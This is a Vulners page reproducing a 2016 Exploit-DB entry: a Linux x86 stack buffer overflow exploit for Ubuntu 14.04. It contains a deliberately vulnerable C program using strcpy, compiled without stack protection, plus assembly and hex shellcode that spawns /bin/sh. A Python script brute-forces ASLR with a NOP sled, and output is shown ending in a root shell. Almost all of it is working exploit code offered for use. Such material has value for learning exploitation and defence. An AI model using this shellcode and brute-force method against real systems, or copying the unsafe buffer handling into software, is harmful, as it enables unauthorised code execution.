Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux x86 /bin/sh Shellcode + ASLR Bruteforce

🗓️ 27 Jun 2016 00:00:00Reported by Pawan LalType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 34 Views

Linux x86 /bin/sh Shellcode + ASLR Bruteforce for Ubuntu 14.04 32 bi

Code
/bin/sh shellcode  Ubuntu 14.0.4 32 bit + ASLR Bruteforce

#shellcodeandaslrbruteforce.c
#Tested on : Ubuntu 14.04 32 bits
#Author : Pawan Lal   [email protected]

*vim shellcodeandaslrbruteforce.c*

#include    <stdio.h>
#include    <stdlib.h>
#include    <assert.h>
#include    <string.h>


void vuln (const char* arg){
    char buffer[100];
    strcpy(buffer, arg);
    printf("Hello %s\n", buffer);
    printf("[+] buffer @ %p\n", buffer);
}

int main (int argc, char **argv){

    if (argc != 2) {
        printf("Usage: %s <buffer>\n", argv[0]);
        exit(1);
    }
    vuln(argv[1]);
        return 0;
}

Makefile with below command

usage : gcc -fno-stack-protector -z execstack shellcodeandaslrbruteforce.c -o shellcodeandaslrbruteforce

Turn On ASLR:

echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
#############################################################

*shellcode that executes '/bin/sh'*

global _start

section .text

_start:
    xor eax, eax
    push eax

    push 0x68732f2f     ;//sh
    push 0x6e69622f     ;/bin
    mov ebx, esp        ;moving the pointer to "/bin//sh" to ebx

    push eax            ;push 0 (=eax)
    mov edx, esp        ;moving 0 to edx

    push ebx
    mov ecx, esp        ;moving the pointer to "/bin//sh" to ecx

    mov al, 11
    int 0x80            ;execv syscall



################################################################

*Final exploit using /bin/sh shellcode and ASLR bruteforce*

*vim shellcodeandaslrbruteforce.py*

#!/usr/bin/python

import struct, sys, time
from subprocess import PIPE, Popen

# exec /bin/sh
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

bufsize = 100
offset = 12     #incl. saved ebp
nopsize = 4096

def prep_buffer(addr_buffer):
    buf = "A" * (bufsize+offset)
    buf += struct.pack("<I",(addr_buffer+bufsize+offset+4))
    buf += "\x90" * nopsize
    buf += shellcode
    return buf

def brute_aslr(buf):
    p = Popen(['./bof', buf]).wait()

if __name__ == '__main__':
    addr_buffer = 0xbf92b39c    # randomly decided
    buf = prep_buffer(addr_buffer)
    i = 0
    while True:
        print i
        brute_aslr(buf)
        i += 1

##################################################################


root@ubuntu:~/bof/shellcodeandaslrbruteforce
⇒ python shellcodeandaslrbruteforce.py
(...)
(...)

[+] buffer @ 0xbfc2bc0c
996
(... snippet)

[+] buffer @ 0xbfb9930c
997
(... snippet)

[+] buffer @ 0xbf92721c
998
(... snippet)

[+] buffer @ 0xbf92a26c
# whoami
root

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Jun 2016 00:00Current
shellcodeaslrubuntubuffer overflowexec syscall
34